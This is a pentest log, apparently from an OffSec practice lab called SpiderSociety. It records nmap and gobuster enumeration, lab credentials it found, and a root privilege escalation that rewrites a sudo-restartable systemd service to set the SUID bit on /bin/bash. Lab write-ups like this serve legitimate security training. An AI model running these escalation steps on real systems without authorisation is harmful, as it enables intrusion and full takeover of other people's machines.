SpiderSociety

๐Ÿงช Pentest Log: {{date:2025-08-18}}

๐Ÿ” Target Information

ip=192.168.199.214

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Directory Scan

gobuster dir -u http://offsec.lab -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt

Found /libspider, use weak credential

admin:admin

Obtain ftp credential

ss_ftpbckuser:ss_WeLoveSpiderSociety_From_Tech_Dept5937!

Port 2121

๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

Found hidden file

.fuhfjkzbdsfuybefzmdbbzdcbhjzdbcukbdvbsdvuibdvnbdvenv

Obtain spidey password

spidey:WithGreatPowerComesGreatSecurity99!

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

Sudo

sudo -l

Found

User spidey may run the following commands on spidersociety:
    (ALL) NOPASSWD: /bin/systemctl restart spiderbackup.service
    (ALL) NOPASSWD: /bin/systemctl daemon-reload
    (ALL) !/bin/bash, !/bin/sh, !/bin/su, !/usr/bin/sudo

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

systemctl cat spiderbackup.service
ls -al /etc/systemd/system/spiderbackup.service

vi /etc/systemd/system/spiderbackup.service

ExecStart=/home/spidey/exploit.sh

vi /home/spidey/exploit.sh

#!/bin/bash
chmod +s /bin/bash


chmod +x exploit.sh
sudo /bin/systemctl daemon-reload
sudo /bin/systemctl restart spiderbackup.service
bash -p